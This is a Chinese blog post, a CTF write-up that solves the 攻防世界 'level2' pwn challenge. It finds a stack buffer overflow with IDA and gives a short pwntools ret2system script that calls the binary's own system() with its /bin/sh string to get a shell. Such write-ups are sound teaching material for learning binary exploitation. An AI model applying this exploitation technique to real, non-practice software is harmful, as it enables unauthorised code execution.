pwn 例题level2解析

最新推荐文章于 2024-07-30 15:02:24 发布
最新推荐文章于 2024-07-30 15:02:24 发布
阅读量418 收藏 1
点赞数 1
分类专栏: pwn 文章标签: 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_67423114/article/details/130394781
版权

题目来源:攻防世界——pwn——level2

1、查壳

分析可知,该文件为ELF文件,32位,几乎无保护措施

2、使用IDA静态分析

 先看main函数,较为简单,比较显眼的是名叫vulnerable_function函数

 从右侧函数栏找到它,双击查看反汇编代码

 可以看到存在一个缓冲区buf,并且大小为0x88,并且该函数返回了一个read函数,大小为0x100u,双击&buf变量具体查看

 

 看开头英文变量以及观察末尾,可知Frame Size大小为0x88,Saved regs大小为0x04,即需要写0x88+0x04个填充后才能到达返回地址

下面就是寻找bin/sh了,由于题目较为基础,我们甚至能够直接在源代码中找到/bin/sh,利用它和main函数已存在的system函数,即可凑齐构造payload的全部材料

无论遇到什么题目,即使机会渺茫,找/bin/sh的第一步仍然是直接按shift+F12,从源代码中寻找/bin/sh的字符串,果然不出所料:

 通过这种套路,确实获得了/bin/sh的地址!下面就是构造payload了,用法:

   payload = 'a' * (offset) + sys_addr + ret_add + sh_addr

于是:

from pwn import *

context.log_level = 'debug'
i = process('./level2')
elf = ELF('./level2')

system_addr = elf.symbols['system'] #system的起始地址
binsh_addr =0x0804A024
payload = 'a'*0x88+'a'*0x4 + p32(system_addr).decode('unicode_escape') + p32(0).decode('unicode_escape') + p32(binsh_addr).decode('unicode_escape')


i.sendlineafter('Input:',payload)
i.interactive()

运行该代码,即可获得shell!

 3、总结

        1、做题先查壳

        2、熟悉read、system函数

        3、找/bin/sh先查字符串

florian.
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
专栏目录
pwn07.ret2syscall例题
11-11
ret2syscall例题
入门pwn题目ret2text
03-26
入门pwn题目ret2text
攻防世界level2[WriteUP]
如有错误感谢斧正
04-14 299
用checksec、file命令查看文件属性与防护32位小端序二进制文件。
pwn题解level(2)
qq_43627239的博客
07-25 561
今天oj里边的level2和level3的32位和64位四道题 写一下32位 其中包含libc 写题解之前 先补充两个内容 1.checksec 是用来检查可执行文件属性的。 Arch:说明这个文件的属性是什么,说明是32位的程序。 Stack:canary,这个主要是说栈保护的东西,所利用的东西就是相当于网站的cookie,linux中把这种cookie信息称为canary,所以如果开...
PWN · ret2syscall】[Wiki] ret2syscall
Mr_Fmnwon的博客
05-06 1551
虽然网上(包括CSDN)有很多ret2syscall的例题,但大多是Wiki,且摘自官方题解蒟蒻想从自己的“碰南墙“的历程出发,以蒟蒻萌新的视角,述说蒟蒻萌新的新路历程~~
pwn》ret2libc2—x64简答例题+脚本加解析
Aiyflwoers的博客
03-28 701
题目地址:链接: https://pan.baidu.com/s/1isG2u-fpihbPt_Lumd4q5A?pwd=r9vn 提取码:r9vn 脚本展示: from pwn import* p=process('./babyrop') context.log_level='debug' gdb.attach(p) elf=ELF("./babyrop") libc=ELF("/lib/x86_64-linux-gnu/libc.so.6") padding=0x28 pop_rdi_ret_addr=
记一次bugku awd pwn题解4月19日
z1r0的博客
04-19 1357
记一次bugku awd pwn题解4月19日 在昨天还是前天的时候看到今天19:00有人开了一个awd房间,闲得没事就准备今天打着玩玩,结果前一个小时在玩忘记到了时间。。。。。 打开房间的时候发现时间已经过了一会了(XD 先连到端口看一下pwn的题目,很像个堆的题目,靶机上的libc是2.27-1.4的 看到保护什么都没有开的时候就猜到应该是写shellcode了。 这里可以内存泄露 这里可以通过buf来劫持heap_ptr这个指针。 接下来笔者还用到的一个地方就是这个释放功能 攻击思路: 因
攻防世界 pwn 二进制漏洞简单题练习区 答题(1-10题解)
小哈里的博客
01-12 5525
序 1、level0 题目描述:菜鸡了解了什么是溢出,他相信自己能得到shell 题目思路: 首先使用checksec检查文件保护机制,是多少位的程序。 64位程序,栈不能执行 继续丢入IDA。 输出字符串helloWord之后执行vulnerable_function()函数,没有与用户交互。 进入vulnerable_function函数,通过伪代码分析逻辑,发现了栈溢出漏洞。 发现buf数组只有0x80字节,但是read函数从中读了0x200个。 或许咱们能够进行溢出,覆盖掉返回地址,
pwn学习】格式化字符漏洞
Morphy_Amo的博客
12-29 5834
文章目录什么是格式化字符漏洞格式化字符串函数格式化字符串利用泄露内存例题 利用格式化字符串漏洞获取libc基址覆盖内存栈地址覆盖小数覆盖大数覆盖轮子 什么是格式化字符漏洞 格式化字符串函数可以接受可变数量的参数,并将第一个参数作为格式化字符串,根据其来解析之后的参数。通俗来说,格式化字符串函数就是将计算机内存中表示的数据转化为我们人类可读的字符串格式。几乎所有的 C/C++ 程序都会利用格式化字符串函数来输出信息,调试程序,或者处理字符串。一般来说,格式化字符串在利用的时候主要分为三个部分。 格式化字符串函
pwn入门--格式化字符串
yjh_fnu_ltn的博客
07-11 416
gdb中格式化字符串在栈上的位置的,就是偏移。
ret2xx----- Pwn中常见的CTF模板命题
weixin_52321473的博客
04-07 1117
其实 这周末我原本是不想写文章的 主要是放假了 但是 我想往常一样登录了百度站长。。。。 我去!!! 我的文章被索引了!!!! 所以呢 我决定多更新点文章出来 而且最近不是有人说看不懂吗 我觉得更新一些可以让人懂的一些东西 但是今天 我还决定把Ret2讲完 本次教学节选于星梦安全团队在Bilibili上发表的视频 部分转载于https://www.anquanke.com/post/id/205858#h2-2 url为 https://www.bilibili.com/video/BV1Uv411j
arm32 android版pwn-level6二进制文件+gdbserver+lldb+socat
04-17
arm32 android版pwn-level6二进制文件+gdbserver+lldb+socat,文章pwn - 零基础ROP之Android ARM 32位篇(新修订)https://blog.csdn.net/tabactivity/article/details/137780714 全部资料文件。 0基础pwn
ret2libc2pwn 入门题
02-11
pwn 入门题
强网杯2022 pwn 赛题解析.docx
12-18
【强网杯2022 Pwn赛题解析】 在网络安全竞赛“强网杯”中,Pwn类赛题往往考验参赛者对内存安全漏洞利用的理解和技术应用。本题涉及的是一道基于高版本glibc的House of Apple攻击,这是一种利用大型bin(large bin)...
科普文:Linux系统安全加固指南
为无为,事无事,味无味。
07-25 1515
本指南仅关注安全性和隐私性,而不关注性能,可用性或其他内容。列出的所有命令都将需要root特权。以“$”符号开头的单词表示一个变量,不同终端之间可能会有所不同。选择一个好的Linux发行版有很多因素。避免分发冻结程序包,因为它们在安全更新中通常很落后不使用与Systemd机制的发行版。Systemd包含许多不必要的攻击面;它尝试做的事情远远超出了必要,并且超出了初始化系统应做的事情。使用musl作为默认的C库。
如何确保PLC系统安全的可靠性,这几个注意事项你需要牢记
u010123476的专栏
07-30 392
斗轮机无线联锁通讯系统取代线缆,避免斗轮机作业故障频发以及维修更换耗时高成本的情况,圆堆厂房内的堆取料机担负着储存、输送原料的重要任务,要实现由2号圆形煤场堆取料机配电室PLC机柜内开关信号无线传输至4号转运电子间DCS机柜,包含允许堆料、允许取料、外围取料运行、堆取料机紧急停机等8路指令信号,及堆料运行、堆料故障、取料故障、取料回路等16路反馈信号,无线传输距离10公里。本文将介绍 PLC 系统设计中的一些安全注意事项,包括电源设计、接地设计、关键数字量输入输出设计和报警设计。
基于JAVA的厨艺交流平台(Vue.js+SpringBoot+MySQL)
08-01
基于Vue.js和SpringBoot的厨艺交流平台是一个功能丰富的在线社区,旨在为烹饪爱好者提供一个分享和学习烹饪技巧的平台。该平台分为管理后台和用户网页端,支持管理员和普通用户两种角色。管理后台提供对菜谱分类、菜谱信息、食材信息、商品信息和美食日志模块的全面管理功能,包括添加、编辑、删除和查询等操作。用户网页端则为用户提供了一个友好的界面,可以浏览和搜索各种菜谱,查看食材和商品信息,发表自己的美食日志,与其他用户互动交流。整个平台采用现代化的前端技术和后端框架,保证了良好的用户体验和高效的数据处理能力。 演示录屏:https://www.bilibili.com/video/BV1uz42197zu 配套教程:https://www.bilibili.com/video/BV1pW4y1P7GR
层次分析法数学建模论文.doc
最新发布
08-01
层次分析法数学建模论文
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

florian.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值